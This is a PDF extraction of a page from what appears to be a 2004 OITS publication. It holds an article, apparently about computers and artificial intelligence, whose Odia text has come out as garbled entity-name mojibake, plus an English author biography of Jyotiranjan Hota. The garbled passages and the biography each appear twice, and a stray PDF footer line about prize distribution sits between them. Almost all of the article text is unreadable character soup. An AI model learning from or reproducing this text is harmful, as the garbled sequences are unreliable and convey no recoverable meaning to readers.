OgravekthornETHBETHHfrac14frac14ETH dETHkthornETHLTHORN Ograve_L jcmacrAEligOgraveethorn SOgraveZjETH^ETHethornZ OgravemthornETHL `lOgraveethorn jcdividea OgravekthornETHB _ETHHfrac14frac14ETHH`eTHORNthornLTHORN OgraveLOgrave[L LETHdagraveOcirc LeTHORNthornaETH`ETHBUuml HLeEcircthorn ^THORNLaTHORN]OcircETHOgraveethorn `ETHethorn=frac14c THORNaETH OgravemthornETHL ]ethornLETHethornOgravekthornETHBETHAlaquoTHORNAEligfrac14frac14ETH OgravejkTHORNthorn eTHORNthorn `otilde[THORNbthornETHaETH_ccedil aOcircbrvbarTHORNAEligfrac14ethorndOgravefrac12curren bthornETHa `eTHORNthornmthornlTHORN[ OgravekthornETHBETHHfrac14frac14ETH cETH[ouml Loacute[oumlTHORNcaEcircwTHORNethorn D`OgravedETHNOgraveethorn _THORNcUgrave[ Expert system HkTHORNthornbthornETHa EumlethornZ LeTHORNthornETHHfrac14frac14ETH

aEcircwTHORNcETH_ccedil aOcircbrvbarTHORNAEligVTHORNH Ograved`eTHORNthorn _EumlA`eTHORNthornOgraveahOgraveethorn _THORNSLEcirc hNtildeOotilde METH`ccedil MEcircAB Ograve_BETHHHkTHORNthorn qc THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn _THORNSethorn NtildehbrvbarTHORNAElig afOgraveethornSVTHORNf LETHdagraveOcircLEcirc jcETH^ETH_ LeTHORNthornETHHfrac14frac14ETH

About the author Jyotiranjan Hota is a softwareconsultant with an exposure to Indian and Internationalprojects He is a BE in Computer Science from NITRourkela and Executive PGP from Xavier Institute ofManagement Bhubaneswar He has around 11 yearsof experience in software consultancy teaching researchactivities and management consultancy He is fond ofwriting technical and general articles in newspapersand Journals of India and abroad His previousexperience includes World Bank funded Projects TataConsultancy Services and OCAC Currently he isassociated with KIIT Deemed University in Departmentof Computer Science and IT His area of strength liesin software engineering DBMS Object OrientedAnalysis and Design Software Project ManagementProfessional Ethics and Decision Support System

Page 47: oits-2004.pdf - created by pdfMachine from Broadgun …OITS-2004 2 Prizes were distributed by the Chief Guest, Bikramjit Maitra. In the senior category, the first, second and third

OITS-2004

43

aTHORN AEligjTHORNjccedilEcircfrac14 LOtilde`EcircOcircVethorn OgraveQjccedil OgraveMfOgraveethorn kthornethornETHBTHORNmthornETHfrac14frac14ETHaTHORNsETH_ethorn NotildeN[THORN jkthorn jETH^ETHethornZ OgravemthornETHL LTHORN eTHORNthornLOtilde`EcircOcircVethornLEcirc akEcircthornf bthornETHaOgraveethorn aOcircakthornETHethorn LeTHORNthorn ETHeTHORNthornOgraveaOgravejTHORN ETHBUuml OgraveaszligsETH_THORNLcETHOgrave_ `otildeOgraveQfrac12currenETH QfETHBOgravemthornfrac14frac14ETHOgraveSethornmicroAElig HaOtilde A`mccedilthorn (Apple) LshyAEligETH_NtildeLOtilde`EcircOcircVethornLEcirc QfETHBaETH`ETHBUuml jkthornS D`ETHmacrAElig aETHkthornETHethornLOgravemthornfrac14frac14ETH `Ograveethorn `Ograveethorn cETHBOgraveLotildeETHj$ccedilfrac14Vccedil(Microsoft)ethorn Windowsethorn DiexclthornETHa_jETH^ETHethornZ OgravemthornETHLfrac14ethorn QETHkTHORNthorn]ETHLEcirc dOgravefrac12curren aYIumlETHBmthornETHfrac14frac14ETHaragravethorncETH_ccedil AOgravec `qc `THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn D`OgraveethornAOgravemthornETHQ_ETH LeTHORNthornaETHfrac14frac14ETH HkthornETHethorn NotildeN[THORN `ETHBUumlOgraveaszligsETH_THORNLcETHOgrave_ ]THORN_ethornETH[THORN NOgraveaiZETH LeTHORNthorn _EumlA _EumlA[Ocirc cETH^OcirccOgraveethorn `oacuteTHORNaNtildeaETHjNtildeEcircfrac14 QLTHORN[ LeTHORNthornaETHOgraveethornmthornETHNTHORNRlaquoTHORNAEligAEligfrac14frac14ETH HkTHORNthorn `THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn cZTHORNi `eTHORNthorn QTHORNlaquoAEligAEligETHLeTHORNthorn ETHOgraveethornfrac14frac14ETH HkthornETH Ograve]MTHORN ETHOgraveethorn lethorn QTHORNkiumlTHORNthorn ETHOgraveethornHaOtilde cZTHORNi `eTHORNthorn _Ecircbthorna LeTHORNthorn ETHOgraveethornfrac14frac14ETH jaEcircWETHeEcircthorncSETHLETH OgravekthornmthornETH HkthornETH hveEcircthorn bTHORNthorn_iuml bTHORNthorn_iuml OgravemthornETHLEcircfrac14QTHORNkiumlTHORNthorn ETHOgraveethorn HaOtilde RaTHORNeEcircthorn c^Ocirc aTHORNOgravehyacuteiZ LeTHORNthorn bTHORNthorn_iuml[ETHaETHeTHORNthorn ETHOgraveethornfrac14frac14ETH HkTHORNthorn `THORNYIumlNtildeethorn LOtilde`EcircOcircVethornOgraveethorn Loacute[oumlTHORNc aEcircwTHORN(Artificial Intelligence)ethorn jkthornETHmacrAElig[ETH_THORNAdETHHfrac14frac14ETH HkTHORNthorn ]ccedilbEumlthorn[ aTHORN]OcircETHethorn `otildeOgravemacrAEligETHN $frac14fOgraveethornLOtilde`EcircOcircVethorn MZTHORN bTHORNthorn[Ograveethorn `otildeOgraveah LeTHORNthorn aTHORNOgravehyacuteiZLeTHORNthorn ETHOgraveethorn DrthorncopyAElig AOgraveNiuml AEligNTHORNeTHORNthorn c^OcircOgraveethorn `otildeOgraveahLeTHORNthorn [Ocirc jOtildeNotildekthorn LeTHORNthorn ETHOgraveethorn XETHbrvbarAEligethorn `eTHORNthorn OgraveethornNNtildeOgrave]MTHORN ETHOgraveethorn cZTHORNi `eTHORNthorn D``ETH]OcircLEcirc `otildecETHZLeTHORNthorn ETHOgraveethorn `ETHZTHORNOgraveethorn aEcircXIumlTHORN ETHOgraveethorn HaOtilde [ETHjccedil J OgraveQjccedilA]THORN OgraveMfTHORN ETHOgraveethornfrac14frac14ETH OgraveLOgrave[L LETHdagraveOcirc LeTHORNthornaETH`ETHBUuml[NtildelccedilZ aEcircwTHORN HaOtilde NETH^ sETH_ethorn AahOcircL[ETH

OgravekthornETHBETHHfrac14frac14ETH dETHkthornETHLTHORN Ograve_L jcmacrAEligOgraveethorn SOgraveZjETH^ETHethornZ OgravemthornETHL `lOgraveethorn jcdividea OgravekthornETHB _ETHHfrac14frac14ETHH`eTHORNthornLTHORN OgraveLOgrave[L LETHdagraveOcirc LeTHORNthornaETH`ETHBUuml HLeEcircthorn ^THORNLaTHORN]OcircETHOgraveethorn `ETHethorn=frac14c THORNaETH OgravemthornETHL ]ethornLETHethornOgravekthornETHBETHAlaquoTHORNAEligfrac14frac14ETH OgravejkTHORNthorn eTHORNthorn `otilde[THORNbthornETHaETH_ccedil aOcircbrvbarTHORNAEligfrac14ethorndOgravefrac12curren bthornETHa `eTHORNthornmthornlTHORN[ OgravekthornETHBETHHfrac14frac14ETH cETH[ouml Loacute[oumlTHORNcaEcircwTHORNethorn D`OgravedETHNOgraveethorn _THORNcUgrave[ Expert system HkTHORNthornbthornETHa EumlethornZ LeTHORNthornETHHfrac14frac14ETH

aEcircwTHORNcETH_ccedil aOcircbrvbarTHORNAEligVTHORNH Ograved`eTHORNthorn _EumlA`eTHORNthornOgraveahOgraveethorn _THORNSLEcirc hNtildeOotilde METH`ccedil MEcircAB Ograve_BETHHHkTHORNthorn qc THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn _THORNSethorn NtildehbrvbarTHORNAElig afOgraveethornSVTHORNf LETHdagraveOcircLEcirc jcETH^ETH_ LeTHORNthornETHHfrac14frac14ETH

About the author Jyotiranjan Hota is a softwareconsultant with an exposure to Indian and Internationalprojects He is a BE in Computer Science from NITRourkela and Executive PGP from Xavier Institute ofManagement Bhubaneswar He has around 11 yearsof experience in software consultancy teaching researchactivities and management consultancy He is fond ofwriting technical and general articles in newspapersand Journals of India and abroad His previousexperience includes World Bank funded Projects TataConsultancy Services and OCAC Currently he isassociated with KIIT Deemed University in Departmentof Computer Science and IT His area of strength liesin software engineering DBMS Object OrientedAnalysis and Design Software Project ManagementProfessional Ethics and Decision Support System